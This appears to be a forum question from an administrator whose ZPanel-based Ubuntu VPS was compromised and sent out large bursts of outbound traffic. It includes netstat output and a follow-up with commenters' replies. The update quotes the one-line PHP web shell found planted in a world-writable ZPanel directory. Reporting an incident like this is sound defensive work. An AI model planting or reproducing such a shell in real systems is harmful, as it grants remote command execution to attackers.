# Ubuntu server seems compromised for a DDOS attack

Tags: ddos, server

I have this VPS Ubuntu v12.04 Server running with DigitalOcean.
Zpanel/Apache/PHP stack was installed on the Server.

For the past few days it was occasionally down.
Initially, I didn't know what happen until I saw the network graph.

[image: Peaks]

There are outbound peaks of ard more than 1Gbps at the time of server down.
Here was the netstat's result at the time:

```
tcp        0      0 localhost:50725      localhost:https      TIME_WAIT  
tcp        0      0 my.public.ip:http    someip:51369         FIN_WAIT2  
tcp        0      0 my.public.ip:http    someip:54377         FIN_WAIT2  
tcp        0      0 my.public.ip:45655   69.xxx.xx.xxx:9001   ESTABLISHED  
tcp        0      0 my.public.ip:http    someip:31125         FIN_WAIT2
```

The line with `69.xxx.xx.xxx` was particularly suspicious.
Currently my quick fix is to use **ufw** to disable all outgoing traffic and block all connection from `69.xxx.xx.xxx`.
But I'm still not sure of the point of entry. How do I fill the hole that left my server vulnerable.

Any advice would be appreciated. I have read suggestions of just wiping the entire server and reinstalling. In my case, this is not really an option.

Could the attacker exploit a vulnerability in our website's PHP to gain an access?

**Update**
So I have found out the way he got in. Some how using FTP he created a file `xxx.php` in one of the `/etc/zpanel/lib` folder which read `system($_REQUEST["xxx"])`

The **zpanel** default settings leave permission of `/etc/zpanel` as `0777` and I'm not sure if it will work setting it otherwise.
Really a big security hole...

Anyone here using zpanel?
I need to know what the correct secured settings are since they totally closed their old forum. There is limited access to support questions through Google Cached!

Do you have any idea how did they gained access, and could this really cause the huge outbound traffic. The owner of the malicious file is `www-data` which is the user for Apache.

Comment: Hey Xander, I will read that but every case can be a bit different. So I think this should still be here.

Comment: Hi, I have added an update. If you have further advise, please feel free to add in.

Comment: What is it that you asking? You've found the vulnerability

Comment: Hi ULkoma, I wanna be certain whether this could actually cause the traffic outbound or it was sth else. If not this is just a small part of the problems. Updated with more questions

Comment: You might have a bug in your PHP site that allows for file creation? If your zpanel is dead, then it is also not being updated/patched? I'd replace zpanel ASAP, but you seem to know that. I'm not sure what you're asking here.